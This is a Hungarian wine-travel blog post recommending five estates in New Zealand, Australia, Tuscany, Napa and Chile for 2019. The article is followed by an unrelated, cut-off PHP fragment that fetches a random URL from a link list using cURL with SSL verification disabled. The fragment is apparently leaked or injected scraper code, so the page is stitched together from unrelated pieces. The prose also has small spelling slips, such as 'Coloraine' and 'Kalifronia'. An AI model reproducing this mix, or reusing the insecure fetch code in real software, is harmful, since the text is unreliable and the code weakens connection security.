Borkalandok 2019-re

Itt az ideje, hogy elővegyük a térképünket és megtervezzük, milyen utazásokon szeretnénk részt venni 2019-ben! Most mutatunk öt olyan úti célt, amelyeket mindenkinek érdemes felvennie az éves bakancslistájára, aki távoli tájakon szeretne szép és különleges borokat kóstolni. Te Mata Birtok / Fotó: Through the Cellar Door Te Mata Birtok – Hawke’s-öböl, Új-Zéland Hónapokat lehetne eltölteni... View Article


Itt az ideje, hogy elővegyük a térképünket és megtervezzük, milyen utazásokon szeretnénk részt venni 2019-ben! Most mutatunk öt olyan úti célt, amelyeket mindenkinek érdemes felvennie az éves bakancslistájára, aki távoli tájakon szeretne szép és különleges borokat kóstolni.

Te Mata Birtok / Fotó: Through the Cellar Door

Te Mata Birtok – Hawke’s-öböl, Új-Zéland

Hónapokat lehetne eltölteni azzal, hogy a Hawke’s-öbölben található 70 pincészetet végiglátogatjuk, de semmiképp ne hagyjuk ki az 1986-ban alapított Te Mata Birtokot. Érdemes kipróbálni a birtok széles kínálatát, beleértve a különféle évjáratú borokat és VIP-kóstoláson is részt venni, amely során megkóstolhatjuk a pincészet ikonikus borát, a Coleraine-t. A legtöbben nem akarták elhinni, hogy Új-Zélandon van jövője a vörösbornak, egész addig, amíg a Coloraine be nem bizonyította, milyen jó bordeaux-i típusú házasítás készülhet a világnak ezen a felén.

Penfolds Magill Birtok / Fotó: Ultimate Winery Experiences Australia

Penfolds Magill Birtok – Adelaide, Dél-Ausztrália

Ez egy kötelező az ausztrál bor rajongói számára! Az 1844-ben alapított Penfolds Magill Birtok nem fekszik messze Adelaide központjától, így mindképp érdemes taxival érkezni a városból, hogy végig kóstolhassuk a borokat. A birtok alapítója, Christopher Rawson Penfold orvos volt, aki beleszeretett a borba, majd a dél-francia borvidékekről hozatott szőlőtőkékkel megalapozta az ausztrál borászat egyik legnagyobb, legkomolyabb borbirodalmát. A birtok ma a Treasury Wine Estates megabirodalom tagja.

Biondi Santi Birtok / Fotó: Franco Biondi Santi

Biondi Santi Birtok – Montalcino, Toszkána, Olaszország

Montalcino hegyi városka Toscanában, amelynek központjától 5 percnyi autóútra fekszik a Biondi Santi pincészet. Utunk ciprusfák árnyékában vezet a Tenuta Greppo birtokig, a brunello di Montalcino, Olaszország egyik legismertebb vörösbora szülőhelyéig. Éppen százötven évvel ezelőttről, 1869-ból származik a brunello első írásos említése, mely az egyeztetés alapján ingyenesen látogatható birtokon meg is tekinthető.

Ashes & Diamonds / Fotó: City Scout Magazine

Ashes & Diamonds – Napa-völgy, Kalifronia

Ha újhullámos élményre vágyunk a Napa-völgyben, tökéletes választás az Ashes & Diamonds. A borvidék az 1960-as években lépett a világpiacra, a pincészet designja ezért ezt a korszakot idézi fel – a Bottle Shock című filmből sokaknak ismerős lehet a régi Napa hangulata. Nemcsak az izgalmas építészet miatt érdemes idelátogatni, hanem a csúcsminőségű borok miatt is. A birtok kínálatában klasszikus és a modern napai borok is megjelennek, hiszen a főborász, Steve Matthianson arra törekszik, hogy a terroir megmutatkozzon a borban.

Matetic Szőlőbirtok / Fotó: Matetic

Matetic Szőlőbirtok – Valparaíso, Chile

Akinek kedve támad némi partmenti chilei shirazhoz, bátran látogasson el a Matetic Szőlőbirtokra! A Santiago és az óceánparti Metata között található biodinamikus borokat készítő pincészetnek saját kis hotele és étterme is van, így az éjszakát is itt tölthetjük és élvezhetjük a slow food elvei szerint készülő finomságokat.

Forrás: Decanter

További izgalmas úti célokról is olvashatnak a VinCE Magazin január közepén megjelenő Bor & Design különszámában, amelyben a magyar és nemzetközi pinceépítészetről is írunk.

No visits yet

The post Borkalandok 2019-re appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>